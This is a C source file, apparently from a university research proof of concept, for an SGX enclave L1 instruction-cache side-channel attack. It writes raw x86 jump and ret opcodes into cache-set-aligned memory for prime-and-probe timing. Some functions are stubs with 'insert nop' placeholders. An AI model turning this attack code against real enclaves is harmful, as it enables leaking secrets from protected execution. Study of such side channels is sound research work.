/*
** SGX non multi-threading (non-MT) stealthy misalignment-based attack

** Usage: see README (step 5) in the top level 
** Authors: 
** Shuwen Deng (shuwen.deng@yale.edu)
** Bowen Huang (bowen.huang@yale.edu)
** Jakub Szefer (jakub.szefer@yale.edu)
*/
#include "encl_t.h"
#include <sgx_trts.h>
#include "secret.h"

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>
#include <inttypes.h>

#define L1I_ASSOCIATIVITY 8
#define L1I_CACHELINE 32
#define L1I_SETS 32
#define PAGE_SIZE 4096


#define JMP_OFFSET ((L1I_CACHELINE) * (L1I_SETS) - 25) 
#define JMP_OPCODE 0xE9
#define RET_OPCODE 0xC3
#define SET(page, set) (((uint8_t *)l1i->memory) + L1I_CACHELINE * ((set) + (page) * (L1I_SETS))) 

volatile char c;


typedef struct l1ipp *l1ipp_t;
l1ipp_t l1i_prepare();
void l1i_release(l1ipp_t l1i);

void l1i_probe(l1ipp_t l1, uint16_t *results);

int l1i_repeatedprobe(l1ipp_t l1, int nrecords, uint64_t *results, int slot);

struct l1ipp{
  uint8_t __attribute__((aligned(0x1000))) memory[L1I_CACHELINE*L1I_SETS*L1I_ASSOCIATIVITY];
  uint8_t monitored[L1I_SETS];
  void *sets[L1I_SETS];
  int nsets;
};

static inline uint32_t rdtscp() {
  uint32_t rv;
  asm volatile ("rdtscp": "=a" (rv) :: "edx", "ecx");
  return rv;
}

static inline uint64_t rdtscp64() {
  uint32_t low, high;
  asm volatile ("rdtscp": "=a" (low), "=d" (high) :: "ecx");
  return (((uint64_t)high) << 32) | low;
}

void delayloop(uint32_t cycles) {
  uint64_t start = rdtscp64();
  while ((rdtscp64()-start) < cycles)
    ;
}

l1ipp_t l1i_prepare(void) {
  static uint8_t jmp[] = { JMP_OPCODE, 
    				JMP_OFFSET & 0xff, 
				(JMP_OFFSET >>8) & 0xff, 
    				(JMP_OFFSET >> 16) & 0xff, 
				(JMP_OFFSET >> 24) & 0xff};
  

  l1ipp_t l1i = (l1ipp_t)malloc(sizeof(struct l1ipp));
  for (int i = 0; i < L1I_SETS; i++) {
    for (int j = 0; j < L1I_ASSOCIATIVITY - 1; j++) {
      uint8_t *p = SET(j, i);
      *p++ = 0xB8;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xB9;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBB;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBA;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = JMP_OPCODE;
      *p++ = JMP_OFFSET & 0xff;
      *p++ = (JMP_OFFSET >>8) & 0xff;
      *p++ = (JMP_OFFSET >> 16) & 0xff;
      *p++ = (JMP_OFFSET >> 24) & 0xff;
    }
    *SET(L1I_ASSOCIATIVITY - 1, i) = RET_OPCODE;
    for (int j = L1I_ASSOCIATIVITY; j < L1I_ASSOCIATIVITY+3 - 1; j++) {
      uint8_t *p = SET(j, i);
      *p++ = 0xB8;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xB9;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBB;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBA;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = JMP_OPCODE;
      *p++ = JMP_OFFSET & 0xff;
      *p++ = (JMP_OFFSET >>8) & 0xff;
      *p++ = (JMP_OFFSET >> 16) & 0xff;
      *p++ = (JMP_OFFSET >> 24) & 0xff;

    }
    *SET(L1I_ASSOCIATIVITY+3 - 1, i) = RET_OPCODE;
  }
  l1i_monitorall(l1i);
  return l1i;
}

int l1i_monitor(l1ipp_t l1i, int line) {
  for (int i = 0;  i < l1i->nsets; i++) 
    if (l1i->monitored[i] == line) 
      return 0;
  l1i->monitored[l1i->nsets++] = line;
  return 1;
}

int l1i_unmonitor(l1ipp_t l1i, int line) {
  for (int i = 0;  i < l1i->nsets; i++) 
    if (l1i->monitored[i] == line) {
      l1i->monitored[i] = l1i->monitored[l1i->nsets--];
      return 1;
    }
  return 0;
}

void l1i_monitorall(l1ipp_t l1i) {
  for (int i = 0; i < L1I_SETS; i++)
    l1i->monitored[i] = i;
  l1i->nsets = L1I_SETS;
  l1i_randomiseX(l1i);
}

void l1i_unmonitorall(l1ipp_t l1i) {
  l1i->nsets = 0;
}


int l1i_getmonitoredset(l1ipp_t l1i, int *lines, int nlines) {
  if (lines != NULL) {
    if (nlines > l1i->nsets)
      nlines = l1i->nsets;
    for (int i = 0; i < nlines; i++)
      lines[i] = l1i->monitored[i];
  }
  return l1i->nsets;
}




void l1i_randomiseX(l1ipp_t l1i) {
  char *mem = (char *)l1i->memory;
  for (int i = 0; i < l1i->nsets; i++) {
  }
  // insert nop3
}



typedef void (*fptr)(void);


void ecall_secret_lookup() 
{
      
     for (uint64_t i = 0; i < 3000; i++/* Increment inside */) {
          asm __volatile (
         ".byte 0xe9 \n"
         ".byte 0x7b \n" //addr5 
         ".byte 0x02 \n" //addr6 
         ".byte 0x00 \n" //addr7
         ".byte 0x00 \n" //addr8
        );
        //i++;
      }
}

int l1i_nsets(l1ipp_t l1i) {
    // insert nop4
  return l1i->nsets;
}

void ecall_secret_lookup_notmap() 
{
      
     for (uint64_t i = 0; i < 3000; i++/* Increment inside */) {
          asm __volatile (
         ".byte 0xe9 \n"
         ".byte 0x7b \n" //addr9 
         ".byte 0x02 \n" //addrA 
         ".byte 0x00 \n" //addrB
         ".byte 0x00 \n" //addrC
        );
        //i++;
      }
}




















